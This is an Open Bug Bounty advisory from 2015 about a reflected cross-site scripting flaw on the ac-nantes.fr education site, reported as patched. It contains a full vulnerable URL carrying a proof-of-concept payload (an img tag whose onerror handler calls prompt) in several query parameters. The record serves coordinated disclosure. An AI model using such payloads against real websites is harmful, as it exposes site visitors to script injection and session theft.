ac-nantes.fr XSS vulnerability

2015-10-09T14:09:00
ID OBB:91029
Type openbugbounty
Reporter P4r4Bellum
Modified 2015-10-09T14:11:00

Description

Vulnerable URL:
http://www.ac-nantes.fr/servlet/com.jsbsoft.jtf.core.SG?%23ECRAN_LOGIQUE%23=RECHERCHE&ACTION;=VALIDER&CODE;_RUBRIQUE=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSPOSED/%29%3E&OBJET;=%3Cimg%20src=x%20onerror=prompt%28/XSSPOSED/%29%3E&PROC;=RECHERCHE&QUERY;=%3Cimg%20src=x%20onerror=prompt%28/XSSPOSED/%29%3E&RH;=ACTUALITE&SEARCH;_SOUSRUBRIQUES=true
Details:

Description| Value
---|---
Patched:| Yes, at 06.11.2015
Latest check for patch:| 06.11.2015 01:29 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 44683
Google Pagerank| 6
VIP website status:| Yes
Check ac-nantes.fr SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 October, 2015 14:09 GMT
Vulnerability existence verified and confirmed| 9 October, 2015 14:11 GMT